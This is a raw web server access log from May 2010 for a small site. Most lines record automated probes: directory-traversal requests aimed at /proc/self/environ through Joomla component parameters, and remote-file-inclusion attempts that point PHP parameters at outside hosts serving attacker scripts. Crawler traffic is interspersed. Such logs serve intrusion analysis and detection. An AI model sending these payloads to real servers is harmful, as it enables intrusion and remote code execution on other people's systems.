80.233.172.42 - - [29/May/2010:23:26:11 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
109.71.41.45 - - [29/May/2010:23:26:26 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
109.71.41.45 - - [29/May/2010:23:26:26 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
193.41.235.46 - - [29/May/2010:23:26:27 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [29/May/2010:23:26:27 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
192.167.114.31 - - [29/May/2010:23:26:32 -0500] "GET /logs/*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [29/May/2010:23:26:32 -0500] "GET /*.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
207.46.13.135 - - [29/May/2010:23:28:27 -0500] "GET /logs/access_log.1247875200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.61.185.200 - - [29/May/2010:23:28:57 -0500] "GET /logs/error.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.61.185.200 - - [29/May/2010:23:28:57 -0500] "GET /logs/access_log.1271289600/error.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.61.185.200 - - [29/May/2010:23:28:57 -0500] "GET /error.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
174.142.207.229 - - [29/May/2010:23:29:10 -0500] "GET /logs/lib/connect.lib.php?g4[path]=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
174.142.207.229 - - [29/May/2010:23:29:10 -0500] "GET /logs/access_log.1271548800/lib/connect.lib.php?g4[path]=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
174.142.207.229 - - [29/May/2010:23:29:10 -0500] "GET /lib/connect.lib.php?g4[path]=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
174.142.207.229 - - [29/May/2010:23:29:15 -0500] "GET /logs/access_log.1271548800/lib/connect.lib.php?g4[path]=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
174.142.207.229 - - [29/May/2010:23:29:15 -0500] "GET /logs/lib/connect.lib.php?g4[path]=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
174.142.207.229 - - [29/May/2010:23:29:15 -0500] "GET /lib/connect.lib.php?g4[path]=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
207.46.204.194 - - [29/May/2010:23:29:57 -0500] "GET /logs/access_log.1200009600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.142.207.229 - - [29/May/2010:23:31:06 -0500] "GET /logs/access_log.1271116800/lib/connect.lib.php?g4[path]=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.195.112.180 - - [29/May/2010:23:31:36 -0500] "GET /?D=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.142.207.229 - - [29/May/2010:23:31:44 -0500] "GET /logs/access_log.1271116800/lib/connect.lib.php?g4[path]=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.38.52.84 - - [29/May/2010:23:34:04 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.38.52.84 - - [29/May/2010:23:34:04 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.7.185.19 - - [29/May/2010:23:37:45 -0500] "GET /logs/index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.7.185.19 - - [29/May/2010:23:37:46 -0500] "GET /index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.7.185.19 - - [29/May/2010:23:37:46 -0500] "GET /logs/index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.7.185.19 - - [29/May/2010:23:37:46 -0500] "GET /index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.46.199.48 - - [29/May/2010:23:37:57 -0500] "GET /logs/access_log.1161907200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.14.231.236 - - [29/May/2010:23:37:59 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 286 "-""libwww-perl/5.805"
74.14.231.236 - - [29/May/2010:23:37:59 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 281 "-""libwww-perl/5.805"
209.126.254.3 - - [29/May/2010:23:38:42 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.76"
209.126.254.3 - - [29/May/2010:23:38:42 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.76"
74.14.231.236 - - [29/May/2010:23:38:55 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 286 "-""libwww-perl/5.805"
74.14.231.236 - - [29/May/2010:23:38:55 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 281 "-""libwww-perl/5.805"
74.50.85.15 - - [29/May/2010:23:40:18 -0500] "GET //skin/ggambo7002_board/write.php?dir=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
74.50.85.15 - - [29/May/2010:23:40:18 -0500] "GET /logs//skin/ggambo7002_board/write.php?dir=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.50.85.15 - - [29/May/2010:23:40:18 -0500] "GET /logs/access_log.1271548800//skin/ggambo7002_board/write.php?dir=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
58.125.181.214 - - [29/May/2010:23:41:47 -0500] "GET /logs//skin/ggambo7002_board/write.php?dir=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.125.181.214 - - [29/May/2010:23:41:47 -0500] "GET /logs/access_log.1271548800//skin/ggambo7002_board/write.php?dir=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
58.125.181.214 - - [29/May/2010:23:41:47 -0500] "GET //skin/ggambo7002_board/write.php?dir=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
200.61.185.200 - - [29/May/2010:23:42:17 -0500] "GET /logs/access_log.1271548800/error.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
38.101.148.126 - - [29/May/2010:23:43:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [29/May/2010:23:43:14 -0500] "GET /logs/access_log.1214092800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [29/May/2010:23:43:21 -0500] "GET /logs/access_log.1247443200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
208.115.111.248 - - [29/May/2010:23:49:25 -0500] "GET /logs/access_log.1234828800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/May/2010:23:49:27 -0500] "GET /logs/access_log.1234915200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/May/2010:23:49:29 -0500] "GET /logs/access_log.1235001600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/May/2010:23:49:31 -0500] "GET /logs/access_log.1235174400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/May/2010:23:49:33 -0500] "GET /logs/access_log.1235347200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/May/2010:23:49:36 -0500] "GET /logs/access_log.1235692800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/May/2010:23:49:38 -0500] "GET /logs/access_log.1235865600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/May/2010:23:49:41 -0500] "GET /logs/access_log.1235952000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/May/2010:23:49:44 -0500] "GET /logs/access_log.1236038400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/May/2010:23:49:46 -0500] "GET /logs/access_log.1236211200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
67.223.250.16 - - [29/May/2010:23:51:13 -0500] "GET ///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 295 "-""Mozilla/5.0"
67.223.250.16 - - [29/May/2010:23:51:14 -0500] "GET ///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 295 "-""libwww-perl/5.833"
67.223.250.16 - - [29/May/2010:23:51:14 -0500] "GET ///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 295 "-"""
67.223.250.16 - - [29/May/2010:23:51:14 -0500] "GET ///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-"""
87.250.255.243 - - [29/May/2010:23:51:15 -0500] "GET /artwork/toys.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.223.250.16 - - [29/May/2010:23:52:05 -0500] "GET /logs///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 300 "-""Mozilla/5.0"
67.223.250.16 - - [29/May/2010:23:52:05 -0500] "GET /logs/access_log.1271203200///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.223.250.16 - - [29/May/2010:23:52:05 -0500] "GET /logs///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 300 "-""libwww-perl/5.833"
67.223.250.16 - - [29/May/2010:23:52:05 -0500] "GET /logs/access_log.1271203200///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 322 "-""libwww-perl/5.833"
67.223.250.16 - - [29/May/2010:23:52:05 -0500] "GET /logs///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 300 "-"""
67.223.250.16 - - [29/May/2010:23:52:05 -0500] "GET /logs/access_log.1271203200///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 322 "-"""
67.223.250.16 - - [29/May/2010:23:52:06 -0500] "GET /logs/access_log.1271203200///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-"""
67.223.250.16 - - [29/May/2010:23:52:06 -0500] "GET /logs///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-"""
67.223.250.16 - - [29/May/2010:23:52:16 -0500] "GET /logs/access_log.1270857600///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.223.250.16 - - [29/May/2010:23:52:16 -0500] "GET /logs/access_log.1270857600///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 322 "-""libwww-perl/5.833"
67.223.250.16 - - [29/May/2010:23:52:16 -0500] "GET /logs/access_log.1270857600///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 322 "-"""
67.223.250.16 - - [29/May/2010:23:52:16 -0500] "GET /logs/access_log.1270857600///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-"""
66.249.65.59 - - [29/May/2010:23:52:22 -0500] "GET /costume/033_JPG%20copy.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
69.175.84.122 - - [29/May/2010:23:55:30 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [29/May/2010:23:55:32 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.64.47.65 - - [29/May/2010:23:55:37 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [29/May/2010:23:55:37 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
74.55.65.134 - - [29/May/2010:23:55:49 -0500] "GET //bbs/skin/delete.all.php?skin_board_path=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.55.65.134 - - [29/May/2010:23:55:49 -0500] "GET /logs/access_log.1271548800//bbs/skin/delete.all.php?skin_board_path=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.55.65.134 - - [29/May/2010:23:55:49 -0500] "GET /logs//bbs/skin/delete.all.php?skin_board_path=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
38.101.148.126 - - [29/May/2010:23:56:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [29/May/2010:23:56:35 -0500] "GET /logs/access_log.1215907200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
69.175.84.122 - - [29/May/2010:23:57:46 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [29/May/2010:23:57:46 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.64.47.65 - - [29/May/2010:23:57:46 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [29/May/2010:23:57:52 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
207.46.195.227 - - [29/May/2010:23:58:27 -0500] "GET /logs/access_log.1168819200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.84.122 - - [29/May/2010:23:58:34 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [29/May/2010:23:58:34 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [29/May/2010:23:58:43 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [29/May/2010:23:58:44 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.64.47.65 - - [29/May/2010:23:58:49 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [29/May/2010:23:58:49 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [29/May/2010:23:58:51 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [29/May/2010:23:58:51 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.175.84.122 - - [30/May/2010:00:00:15 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:00:15 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:00:15 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.831"
69.64.47.65 - - [30/May/2010:00:00:18 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:00:18 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:00:18 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.810"
69.175.84.122 - - [30/May/2010:00:00:21 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:00:21 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:00:21 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.831"
69.64.47.65 - - [30/May/2010:00:00:49 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:00:49 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:00:49 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.810"
174.121.64.231 - - [30/May/2010:00:01:33 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:02:11 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.175.84.122 - - [30/May/2010:00:02:11 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:00:02:24 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.64.47.65 - - [30/May/2010:00:02:26 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
84.53.217.109 - - [30/May/2010:00:04:23 -0500] "GET /logs/access_log.1262563200//includes/class_item.php?fileExtension=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.53.217.109 - - [30/May/2010:00:04:23 -0500] "GET /logs//includes/class_item.php?fileExtension=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.53.217.109 - - [30/May/2010:00:04:24 -0500] "GET //includes/class_item.php?fileExtension=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.53.217.109 - - [30/May/2010:00:04:44 -0500] "GET /logs/access_log.1271376000//includes/class_item.php?fileExtension=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.195.112.180 - - [30/May/2010:00:04:53 -0500] "GET /logs/access_log.1165017600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.64.47.65 - - [30/May/2010:00:05:12 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:05:13 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:05:13 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:05:19 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:05:19 -0500] "GET //?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
69.64.47.65 - - [30/May/2010:00:05:19 -0500] "GET /logs//?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7548 "-""libwww-perl/5.810"
62.43.194.164 - - [30/May/2010:00:05:19 -0500] "GET //includes/class_item.php?fileExtension=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
